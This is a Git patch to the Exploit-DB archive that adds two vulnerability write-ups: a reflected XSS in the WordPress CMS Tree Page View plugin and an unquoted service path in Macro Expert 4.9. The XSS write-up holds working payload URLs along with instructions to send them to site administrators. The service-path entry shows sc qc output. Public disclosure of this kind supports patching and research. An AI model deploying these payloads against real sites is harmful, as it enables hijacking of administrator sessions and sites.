From ccfd0c515d364f5407082c26840219fc8235e9b0 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Wed, 7 Jun 2023 00:16:24 +0000 Subject: [PATCH] DB: 2023-06-07 3 changes to exploits/shellcodes/ghdb Enrollment System Project v1.0 - SQL Injection Authentication Bypass (SQLI) Tree Page View Plugin 1.6.7 - Cross Site Scripting (XSS) GitLab v15.3 - Remote Code Execution (RCE) (Authenticated) Macro Expert 4.9 - Unquoted Service Path --- exploits/php/webapps/51507.txt | 34 ++++++++++++++++++++++++++++++++ exploits/windows/local/51506.txt | 25 +++++++++++++++++++++++ files_exploits.csv | 6 ++++-- 3 files changed, 63 insertions(+), 2 deletions(-) create mode 100644 exploits/php/webapps/51507.txt create mode 100644 exploits/windows/local/51506.txt diff --git a/exploits/php/webapps/51507.txt b/exploits/php/webapps/51507.txt new file mode 100644 index 000000000..de014f8cb --- /dev/null +++ b/exploits/php/webapps/51507.txt @@ -0,0 +1,34 @@ +# Exploit Title: Tree Page View Plugin 1.6.7 - Cross Site Scripting (XSS) +# Google Dork: inurl:/wp-content/plugins/cms-tree-page-view/ +# Date: 2023-04-24 +# Exploit Author: LEE SE HYOUNG (hackintoanetwork) +# Vendor Homepage: https://wordpress.org/plugins/cms-tree-page-view/ +# Software Link: https://downloads.wordpress.org/plugin/cms-tree-page-view.1.6.6.zip +# Category: Web Application +# Version: 1.6.7 +# Tested on: Debian / WordPress 6.1.1 +# CVE : CVE-2023-30868 +# Reference: https://patchstack.com/database/vulnerability/cms-tree-page-view/wordpress-cms-tree-page-view-plugin-1-6-7-cross-site-scripting-xss-vulnerability?_s_id=cve + +# 1. Technical Description: +The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7. +This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed. + + +# 2. Proof of Concept (PoC): + +WordPress CMS Tree Page View Plugin <= 1.6.7 Cross-Site Scripting (XSS) +In the case of this vulnerability, there are two XSS PoCs available: one for version 1.6.6 and another for version 1.6.7. + +1. CMS Tree Page View Plugin <= 1.6.6 + + a. Send the following URL to users with administrator privileges or higher: http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E. + + b. your payload will be executed.

[!] note : To make the payload work, the "In menu" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts. + +2. CMS Tree Page View Plugin <= 1.6.7 + + a. Send the following URL to users with administrator privileges or higher: http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22+accesskey%3DC+onclick%3Djavascript%3Aalert%281%29%3B+a%3D%22. + + b. Your payload will execute the script when the user presses Ctrl + Alt + c (Mac) or Alt + Shift + c (Windows). +
[!] note : To make the payload work, the "In menu" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts. \ No newline at end of file diff --git a/exploits/windows/local/51506.txt b/exploits/windows/local/51506.txt new file mode 100644 index 000000000..fd7e99543 --- /dev/null +++ b/exploits/windows/local/51506.txt @@ -0,0 +1,25 @@ +# Exploit Title: Macro Expert 4.9 - Unquoted Service Path +# Date: 04/06/2023 +# Exploit Author: Murat DEMIRCI +# Vendor Homepage: http://www.macro-expert.com/ +# Software Link: http://www.macro-expert.com/product/gm_setup_4.9.exe +# Version: 4.9 +# Tested on: Windows 10 + +# Proof of Concept : + +C:\Users\Murat>sc qc "Macro Expert" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: Macro Expert + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : c:\program files (x86)\grasssoft\macro expert\MacroService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Macro Expert + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +# If a malicious payload insert into related path and service is executed in anyway, this can gain new privilege access to the system and perform malicious acts. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index e4b75c62e..738f6653e 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -17799,7 +17799,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 3050,exploits/php/webapps/3050.txt,"Enigma 2 Coppermine Bridge - 'boarddir' Remote File Inclusion",2006-12-30,"Mehmet Ince",webapps,php,,2006-12-29,,1,OSVDB-33350;CVE-2006-6864,,,,, 38862,exploits/php/webapps/38862.txt,"Enorth Webpublisher CMS - 'thisday' SQL Injection",2013-12-06,xin.wang,webapps,php,,2013-12-06,2015-12-04,1,CVE-2013-6985;OSVDB-100672,,,,,https://www.securityfocus.com/bid/64110/info 28105,exploits/php/webapps/28105.txt,"eNpaper1 - 'Root_Header.php' Remote File Inclusion",2006-06-26,almaster,webapps,php,,2006-06-26,2013-09-05,1,,,,,,https://www.securityfocus.com/bid/18649/info -51501,exploits/php/webapps/51501.txt,"Enrollment System Project v1.0 - SQL Injection Authentication Bypass (SQLI)",2023-06-04,"VIVEK CHOUDHARY",webapps,php,,2023-06-04,2023-06-04,0,CVE-2023-33584,,,,, +51501,exploits/php/webapps/51501.txt,"Enrollment System Project v1.0 - SQL Injection Authentication Bypass (SQLI)",2023-06-04,"VIVEK CHOUDHARY",webapps,php,,2023-06-04,2023-06-06,1,CVE-2023-33584,,,,, 26650,exploits/php/webapps/26650.txt,"Entergal MX 2.0 - Multiple SQL Injections",2005-11-29,r0t,webapps,php,,2005-11-29,2013-07-07,1,CVE-2005-3958;OSVDB-21164,,,,,https://www.securityfocus.com/bid/15631/info 26916,exploits/php/webapps/26916.txt,"Enterprise Connector 1.0.2 - 'main.php' SQL Injection",2005-12-20,"Attila Gerendi",webapps,php,,2005-12-20,2013-07-18,1,CVE-2005-4563;OSVDB-22163,,,,,https://www.securityfocus.com/bid/15984/info 42713,exploits/php/webapps/42713.txt,"Enterprise Edition Payment Processor Script 3.7 - SQL Injection",2017-09-14,"Ihsan Sencan",webapps,php,,2017-09-14,2017-09-14,0,,,,,, @@ -30855,6 +30855,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 2471,exploits/php/webapps/2471.pl,"Travelsized CMS 0.4 - 'FrontPage.php' Remote File Inclusion",2006-10-03,Kacper,webapps,php,,2006-10-02,2016-12-01,1,OSVDB-29490;CVE-2006-5182,,,,http://www.exploit-db.comtravelsized-0.4.tar.bz2, 31388,exploits/php/webapps/31388.txt,"Travelsized CMS 0.4.1 - 'index.php' Multiple Local File Inclusions",2008-03-12,muuratsalo,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-1324;OSVDB-43517,,,,,https://www.securityfocus.com/bid/28218/info 2611,exploits/php/webapps/2611.txt,"Trawler Web CMS 1.8.1 - Multiple Remote File Inclusions",2006-10-21,k1tk4t,webapps,php,,2006-10-20,,1,OSVDB-29969;CVE-2006-5495;OSVDB-29968;OSVDB-29967;OSVDB-29966;OSVDB-29965;OSVDB-29964;OSVDB-29963;OSVDB-29962;OSVDB-29961;OSVDB-29960,,,,, +51507,exploits/php/webapps/51507.txt,"Tree Page View Plugin 1.6.7 - Cross Site Scripting (XSS)",2023-06-06,"LEE SE HYOUNG",webapps,php,,2023-06-06,2023-06-06,0,CVE-2023-30868,,,,, 42972,exploits/php/webapps/42972.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - 'Proxy.php' Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",webapps,php,,2017-10-11,2018-01-18,0,,,,,, 42895,exploits/php/webapps/42895.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - 'Host' Header Injection",2017-09-28,hyp3rlinx,webapps,php,,2017-09-28,2017-09-28,1,CVE-2017-14087,,,,, 42893,exploits/php/webapps/42893.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Information Disclosure",2017-09-28,hyp3rlinx,webapps,php,,2017-09-28,2017-09-28,1,CVE-2017-14085,,,,, @@ -34553,7 +34554,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50889,exploits/ruby/webapps/50889.txt,"GitLab 14.9 - Stored Cross-Site Scripting (XSS)",2022-04-26,Greenwolf,webapps,ruby,,2022-04-26,2022-05-11,0,CVE-2022-1175,,,,, 49822,exploits/ruby/webapps/49822.txt,"GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration",2021-05-03,4D0niiS,webapps,ruby,,2021-05-03,2021-06-07,0,,,,,, 49821,exploits/ruby/webapps/49821.sh,"GitLab Community Edition (CE) 13.10.3 - User Enumeration",2021-05-03,4D0niiS,webapps,ruby,,2021-05-03,2021-06-07,0,,,,,, -51181,exploits/ruby/webapps/51181.py,"GitLab v15.3 - Remote Code Execution (RCE) (Authenticated)",2023-04-01,"Antonio Francesco Sardella",webapps,ruby,,2023-04-01,2023-04-01,0,CVE-2022-2884,,,,, +51181,exploits/ruby/webapps/51181.py,"GitLab v15.3 - Remote Code Execution (RCE) (Authenticated)",2023-04-01,"Antonio Francesco Sardella",webapps,ruby,,2023-04-01,2023-06-06,1,CVE-2022-2884,,,,, 42961,exploits/ruby/webapps/42961.txt,"Metasploit Web UI < 4.14.1-20170828 - Cross-Site Request Forgery",2017-08-30,"Dhiraj Mishra",webapps,ruby,,2017-10-08,2020-08-22,1,CVE-2017-15084,,,,, 39730,exploits/ruby/webapps/39730.txt,"NationBuilder - Multiple Persistent Cross-Site Scripting Vulnerabilities",2016-04-25,LiquidWorm,webapps,ruby,443,2016-04-25,2016-04-25,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5318.php 39997,exploits/ruby/webapps/39997.txt,"Radiant CMS 1.1.3 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2016-06-21,"David Silveiro",webapps,ruby,80,2016-06-21,2016-06-21,0,,,,,http://www.exploit-db.comradiant-1.1.3.tar.gz, @@ -40221,6 +40222,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49694,exploits/windows/local/49694.txt,"MacPaw Encrypto 1.0.1 - 'Encrypto Service' Unquoted Service Path",2021-03-22,"Ismael Nava",local,windows,,2021-03-22,2021-03-22,0,,,,,, 40428,exploits/windows/local/40428.txt,"Macro Expert 4.0 - Multiple Privilege Escalations",2016-09-26,Tulpa,local,windows,,2016-09-26,2016-09-26,0,,,,,http://www.exploit-db.comgm_setup.exe, 50431,exploits/windows/local/50431.txt,"Macro Expert 4.7 - Unquoted Service Path",2021-10-20,"Mert Daş",local,windows,,2021-10-20,2021-10-21,0,,,,,, +51506,exploits/windows/local/51506.txt,"Macro Expert 4.9 - Unquoted Service Path",2023-06-06,"Murat DEMİRCİ",local,windows,,2023-06-06,2023-06-06,0,,,,,, 36928,exploits/windows/local/36928.py,"Macro Toolworks 7.5 - Local Buffer Overflow",2012-03-08,"Julien Ahrens",local,windows,,2012-03-08,2015-05-07,1,OSVDB-80564,,,,,https://www.securityfocus.com/bid/52351/info 30680,exploits/windows/local/30680.txt,"Macrovision SafeDisc - 'SecDRV.SYS' Method_Neither Privilege Escalation",2007-10-18,"Elia Florio",local,windows,,2007-10-18,2014-01-06,1,CVE-2007-5587;OSVDB-41429,,,,,https://www.securityfocus.com/bid/26121/info 49017,exploits/windows/local/49017.txt,"Magic Mouse 2 utilities 2.20 - 'magicmouse2service' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,,2020-11-09,2020-11-09,0,,,,,,